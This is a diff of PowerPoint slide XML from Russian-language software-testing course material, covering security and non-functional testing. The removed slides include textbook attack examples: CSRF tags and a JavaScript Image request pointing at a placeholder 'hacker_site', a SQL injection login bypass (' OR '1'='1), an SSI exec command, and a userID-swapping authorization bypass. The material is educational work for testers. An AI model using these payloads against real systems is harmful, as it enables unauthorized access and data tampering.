-          <a:p>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
-              <a:t>Наиболее частыми CSRF атаками являются атаки использующие HTML &lt;IMG&gt; тэг или </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
-              <a:t>Javascript</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
-              <a:t> объект </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
-              <a:t>image</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
-              <a:t>. Чаще всего атакующий добавляет необходимый код в электронное письмо или выкладывает на </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
-              <a:t>веб-сайт</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
-              <a:t>, таким образом, что при загрузке страницы осуществляется запрос, выполняющий вредоносный код. Примеры:</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
-              <a:t>IMG SRC</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
-              <a:t>&lt;</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
-              <a:t>img</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
-              <a:t> </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
-              <a:t>src=</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
-              <a:t>"http://hacker_site/?command"&gt;</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
-              <a:t>SCRIPT SRC</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
-              <a:t>&lt;</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
-              <a:t>script</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
-              <a:t> </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
-              <a:t>src=</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
-              <a:t>"http://hacker_site/?command"&gt;</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
-              <a:t>Javascript</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
-              <a:t> объект </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
-              <a:t>Image</a:t>
-            </a:r>
-            <a:endParaRPr lang="ru-RU" dirty="0" smtClean="0"/>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
-              <a:t>&lt;</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
-              <a:t>script</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
-              <a:t>&gt; </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
-              <a:t>var</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
-              <a:t> </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
-              <a:t>foo</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
-              <a:t> = </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
-              <a:t>new</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
-              <a:t> </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
-              <a:t>Image</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
-              <a:t>(); </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
-              <a:t>foo.src</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
-              <a:t> = "http://hacker_site/?command"; &lt;/</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
-              <a:t>script</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
-              <a:t>&gt;</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" b="1" dirty="0" err="1" smtClean="0"/>
-              <a:t>Code</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" b="1" dirty="0" smtClean="0"/>
-              <a:t> </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" b="1" dirty="0" err="1" smtClean="0"/>
-              <a:t>injections</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" b="1" dirty="0" smtClean="0"/>
-              <a:t> (SQL, PHP, ASP и т.д.)</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
-              <a:t>Вставки исполняемого кода рассмотрим на примере кода SQL.</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
-              <a:t>Форма входа в систему имеет 2 поля - имя и пароль. Обработка происходит в базе данных через выполнение SQL запроса:</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
-              <a:t>SELECT </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
-              <a:t>Username</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
-              <a:t> FROM </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
-              <a:t>Users</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
-              <a:t> WHERE </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
-              <a:t>Name</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
-              <a:t> = '</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
-              <a:t>tester</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
-              <a:t>' AND </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
-              <a:t>Password</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
-              <a:t> = '</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
-              <a:t>testpass';Вводим</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
-              <a:t> корректное имя ’</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
-              <a:t>tester</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
-              <a:t>’, а в поле пароль вводим строку:</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
-              <a:t>testpass</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
-              <a:t>' OR '1'='1</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
-              <a:t>В итоге, Если поле не имеет соответствующих </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
-              <a:t>валидаций</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
-              <a:t> или обработчиков данных, может вскрыться уязвимость, позволяющая зайти в защищенную паролем систему, </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
-              <a:t>т.к.SQL</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
-              <a:t> запрос примет следующий вид:</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
-              <a:t>SELECT </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
-              <a:t>Username</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
-              <a:t> FROM </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
-              <a:t>Users</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
-              <a:t> WHERE </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
-              <a:t>Name</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
-              <a:t> = '</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
-              <a:t>tester</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
-              <a:t>' AND </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
-              <a:t>Password</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
-              <a:t> = '</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
-              <a:t>testpass</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
-              <a:t>' OR '1'='1';Условие '1'='1' всегда будет истинным и поэтому SQL запрос всегда будет возвращать много значений.</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="ru-RU" b="1" dirty="0" err="1" smtClean="0"/>
-              <a:t>Server-Side</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" b="1" dirty="0" smtClean="0"/>
-              <a:t> </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" b="1" dirty="0" err="1" smtClean="0"/>
-              <a:t>Includes</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" b="1" dirty="0" smtClean="0"/>
-              <a:t> (SSI) </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" b="1" dirty="0" err="1" smtClean="0"/>
-              <a:t>Injection</a:t>
-            </a:r>
-            <a:endParaRPr lang="ru-RU" b="1" dirty="0" smtClean="0"/>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
-              <a:t>В зависимости от типа операционной системы команды могут быть разными, как пример рассмотрим команду, которая выводит на экран список файлов в OS </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
-              <a:t>Linux</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
-              <a:t>:</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
-              <a:t>&lt; !--#</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
-              <a:t>exec</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
-              <a:t> </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
-              <a:t>cmd=</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
-              <a:t>"</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
-              <a:t>ls</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
-              <a:t>" --&gt;</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="ru-RU" b="1" dirty="0" err="1" smtClean="0"/>
-              <a:t>Authorization</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" b="1" dirty="0" smtClean="0"/>
-              <a:t> </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" b="1" dirty="0" err="1" smtClean="0"/>
-              <a:t>Bypass</a:t>
-            </a:r>
-            <a:endParaRPr lang="ru-RU" b="1" dirty="0" smtClean="0"/>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
-              <a:t>Пользователь А может получить доступ к документам пользователя Б. Допустим, есть реализация, где при просмотре своего профиля, содержащего </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
-              <a:t>конфеденциальную</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
-              <a:t> информацию, в URL страницы передается </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
-              <a:t>userID</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
-              <a:t>, а данном случае есть смысл попробовать подставить вместо своего </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
-              <a:t>userID</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
-              <a:t> номер другого пользователя. И если вы увидите его данные, значит вы нашли дефект.</a:t>
-            </a:r>
           </a:p>
           <a:p>
             <a:endParaRPr lang="ru-RU" dirty="0" smtClean="0"/>
@@ -1946,89 +931,46 @@
           <a:p>
             <a:r>
               <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
-              <a:t>Нефункциональное тестирование включает, но не ограничивается, нагрузочное тестирование, тестирование производительности, стресс-тестирование, тестирование удобства использования, тестирование восстановления, тестирование надежности и тестирование переносимости. </a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:endParaRPr lang="ru-RU" dirty="0" smtClean="0"/>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
-              <a:t>Это тестирование того, «как» система работает. </a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:endParaRPr lang="ru-RU" dirty="0" smtClean="0"/>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
-              <a:t>Нефункциональное тестирование может выполняться на всех уровнях тестирования. </a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:endParaRPr lang="ru-RU" dirty="0" smtClean="0"/>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
-              <a:t>Термин нефункциональное тестирование описывает тесты, необходимые для оценки характеристик систем и программ, которые могут быть количественно измерены, такие как время отклика при тестировании производительности. Эти тесты могут ссылаться на модели качества, такие как «Разработка программного обеспечения – Качество программного продукта» (ISO 9126). </a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:endParaRPr lang="ru-RU" dirty="0" smtClean="0"/>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
-              <a:t>Нефункциональное тестирование рассматривает внешнее поведение программного обеспечения и в большинстве случаев использует разработку тестов методом черного ящика. </a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:endParaRPr lang="ru-RU" dirty="0" smtClean="0"/>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
-              <a:t>Нагрузочное</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" baseline="0" dirty="0" smtClean="0"/>
-              <a:t> тестирование (</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
-              <a:t>load testing</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" baseline="0" dirty="0" smtClean="0"/>
-              <a:t>) – вид тестирование производительности, проводимый с целью оценить поведение компонента или системы под увеличивающейся нагрузкой (число одновременно работающих пользователей </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" baseline="0" dirty="0" err="1" smtClean="0"/>
-              <a:t>и\</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" baseline="0" dirty="0" smtClean="0"/>
-              <a:t> или число транзакций) для определения максимально допустимого уровня нагрузки для исследуемого компонента или системы.</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:endParaRPr lang="ru-RU" baseline="0" dirty="0" smtClean="0"/>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="ru-RU" baseline="0" dirty="0" smtClean="0"/>
-              <a:t>Тестирование производительности (</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
-              <a:t>performance testing</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" baseline="0" dirty="0" smtClean="0"/>
-              <a:t>)</a:t>
+              <a:t>С развитием сетевых технологий и интернета взаимодействие разных систем, сервисов и приложений друг с другом приобрело значительную актуальность, так как любые связанные с этим проблемы могут привести к падению авторитета компании, что как следствие повлечет за собой финансовые потери. Поэтому к тестированию взаимодействия стоит подходить со всей серьезностью.</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="ru-RU" b="1" dirty="0" smtClean="0"/>
+              <a:t>Тестирование взаимодействия</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
+              <a:t> (</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" b="1" dirty="0" err="1" smtClean="0"/>
+              <a:t>Interoperability</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" b="1" dirty="0" smtClean="0"/>
+              <a:t> </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" b="1" dirty="0" err="1" smtClean="0"/>
+              <a:t>Testing</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
+              <a:t>) – это функциональное тестирование, проверяющее способность приложения взаимодействовать с одним и более компонентами или системами.</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
+              <a:t>Программное обеспечение с хорошими характеристиками взаимодействия может быть легко интегрировано с другими системами, не требуя каких-либо серьезных модификаций. В этом случае, количество изменений и время, требуемое на их выполнение, могут быть использованы для измерения возможности взаимодействия.</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
+              <a:t>Integration testing</a:t>
             </a:r>
             <a:r>
               <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
@@ -2036,539 +978,141 @@
             </a:r>
             <a:r>
               <a:rPr lang="ru-RU" baseline="0" dirty="0" smtClean="0"/>
-              <a:t>– процесс тестирования с целью определить производительность программного продукта. </a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:endParaRPr lang="ru-RU" baseline="0" dirty="0" smtClean="0"/>
-          </a:p>
-          <a:p>
+              <a:t>проверяет, как компоненты одной системы взаимодействуют между собой.</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
+              <a:t>Interoperability</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
+              <a:t> </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
+              <a:t>testing </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
+              <a:t>проверяет,</a:t>
+            </a:r>
             <a:r>
               <a:rPr lang="ru-RU" baseline="0" dirty="0" smtClean="0"/>
-              <a:t>Стресс тестирование (</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
-              <a:t>stress testing</a:t>
+              <a:t> что части разных систем могут взаимодействовать между собой.</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
+              <a:t>Compatibility</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
+              <a:t> </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
+              <a:t>testing</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
+              <a:t> проверяет, как компоненты или системы одновременно</a:t>
             </a:r>
             <a:r>
               <a:rPr lang="ru-RU" baseline="0" dirty="0" smtClean="0"/>
-              <a:t>)</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
-              <a:t> </a:t>
+              <a:t> могут работать в одном окружении.</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
+              <a:t>Portability</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
+              <a:t>  </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
+              <a:t>testing </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
+              <a:t>проверяет, как система или компонент работают в</a:t>
             </a:r>
             <a:r>
               <a:rPr lang="ru-RU" baseline="0" dirty="0" smtClean="0"/>
-              <a:t> - вид тестирования производительности, оценивающий систему или компонент на различных граничных значениях рабочих нагрузок или за их пределами, или же в состоянии ограниченных ресурсов, таких как память или доступ к серверу.</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:endParaRPr lang="ru-RU" baseline="0" dirty="0" smtClean="0"/>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
-              <a:t>Тестирование удобства использования (</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
-              <a:t>usability testing</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
-              <a:t>) - это метод тестирования, направленный на установление степени удобства использования, </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
-              <a:t>обучаемости</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
-              <a:t>, понятности и привлекательности для пользователей разрабатываемого продукта в контексте заданных условий.</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
-              <a:t>Тестирование удобства пользования дает оценку уровня удобства использования приложения по следующим пунктам:</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="ru-RU" b="1" dirty="0" smtClean="0"/>
-              <a:t>производительность, эффективность</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
-              <a:t> (</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" b="1" dirty="0" err="1" smtClean="0"/>
-              <a:t>efficiency</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
-              <a:t>) - сколько времени и шагов понадобится пользователю для завершения основных задач приложения, например, размещение новости, регистрации, покупка и т.д.? (</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" i="1" dirty="0" smtClean="0"/>
-              <a:t>меньше - лучше</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
-              <a:t>)</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="ru-RU" b="1" dirty="0" smtClean="0"/>
-              <a:t>правильность</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
-              <a:t> (</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" b="1" dirty="0" err="1" smtClean="0"/>
-              <a:t>accuracy</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
-              <a:t>) - сколько ошибок сделал пользователь во время работы с приложением? (</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" i="1" dirty="0" smtClean="0"/>
-              <a:t>меньше - лучше</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
-              <a:t>)</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="ru-RU" b="1" dirty="0" smtClean="0"/>
-              <a:t>активизация в памяти</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
-              <a:t> (</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" b="1" dirty="0" err="1" smtClean="0"/>
-              <a:t>recall</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
-              <a:t>) – как много пользователь помнит о работе приложения после приостановки работы с ним на длительный период времени? (</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" i="1" dirty="0" smtClean="0"/>
-              <a:t>повторное выполнение операций после перерыва должно проходить быстрее чем у нового пользователя</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
-              <a:t>)</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="ru-RU" b="1" dirty="0" smtClean="0"/>
-              <a:t>эмоциональная реакция</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
-              <a:t> (</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" b="1" dirty="0" err="1" smtClean="0"/>
-              <a:t>emotional</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" b="1" dirty="0" smtClean="0"/>
-              <a:t> </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" b="1" dirty="0" err="1" smtClean="0"/>
-              <a:t>response</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
-              <a:t>) – как пользователь себя чувствует после завершения задачи - растерян, испытал стресс? Порекомендует ли пользователь систему своим друзьям? (</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" i="1" dirty="0" smtClean="0"/>
-              <a:t>положительная реакция - лучше</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
-              <a:t>)</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:endParaRPr lang="ru-RU" dirty="0" smtClean="0"/>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
-              <a:t>Тестирование </a:t>
-            </a:r>
-            <a:r>
